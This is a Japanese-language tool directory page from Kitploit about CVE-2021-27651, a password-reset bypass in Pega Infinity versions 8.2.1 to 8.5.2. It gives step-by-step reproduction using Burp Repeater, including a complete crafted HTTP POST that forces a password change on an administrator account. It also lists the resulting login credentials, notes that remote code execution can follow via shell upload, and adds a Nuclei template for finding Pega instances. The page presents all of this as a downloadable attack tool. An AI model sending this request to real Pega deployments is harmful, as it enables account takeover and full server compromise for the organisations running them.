Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-27651 — パスワードリセットフローのすべての段階をバイパスする | Kitploit
ツール/GitHubGitHub/orangmuda/cve-2021-27651
パスワード攻撃コード分析エクスプロイトウェブアプリケーション悪用認証リモートアクセスツール
GitHuborangmuda/cve-2021-27651

CVE-2021-27651

パスワードリセットフローのすべての段階をバイパスする

リポジトリを見る
114年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

概要

攻撃者は、パスワードリセットフローのすべての段階をバイパスして、Pega Infinity 上の任意のユーザーのアカウントをリセットできます。これは、(1) パスワードリセットフローを開始して被害者のメールアドレスを入力し、(2) HTTP POST リクエストを強制的に通過させてパスワードを更新させることで行われます。攻撃者は、新しく編集されたアカウントを使用してログインし、多くの許容された認証後コード実行ベクター(動的ページの変更、テンプレートなど)を介して Pega インスタンスを完全に侵害できます。

再現手順

  1. 任意の Pega インスタンスのログインページに移動します。
  2. 「reset password」をクリックします。
  3. 「[email protected]」と入力し、HTTP リクエストをプロキシし、「[email protected]」を含む HTTP リクエストを Burp Repeater タブまたは類似のタブに送信し、プロキシを無効にするか「send」をクリックしてリクエストを通過させます。
  4. 最初のリクエストを通過させた後、Repeater 内の HTTP リクエストボディを、以下のデータが含まれるように変更します...
root@kitploit:~
POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1 (:PEGA_ID is a unique ID for each site, it is in this format: ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W)
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://redacted.com
DNT: 1
Connection: close
Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD
Cookie: yourCookie
Upgrade-Insecure-Requests: 1

pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=
  1. HTTP リクエストを送信した後、パスワードリセットの確認部分をバイパスし、管理者アカウントにログインできるため、以下の資格情報を使用してログインします。
root@kitploit:~
[email protected] / Rules@1234
  1. そこから、管理者専用コード実行ベクターとして許容されている多くの方法のいずれかを介して RCE を達成できます。

影響を受けるバージョン

Pega Infinity >= 8.2.1 Pega Infinity <= 8.5.2

影響

事前知識なしで、任意の Pega インスタンスを完全に侵害できます。

サポートメディア

パスワードバイパス

  • パスワードバイパス

シェルアップロードによるリモートコード実行

  • シェルアップロードによるリモートコード実行

Nuclei テンプレート

root@kitploit:~
id: pega

info:
  name: Pega Infinity Login
  author: sshell
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "Pega API"

クレジット

Andri Wijayanti (@andridev_),

ツールをダウンロード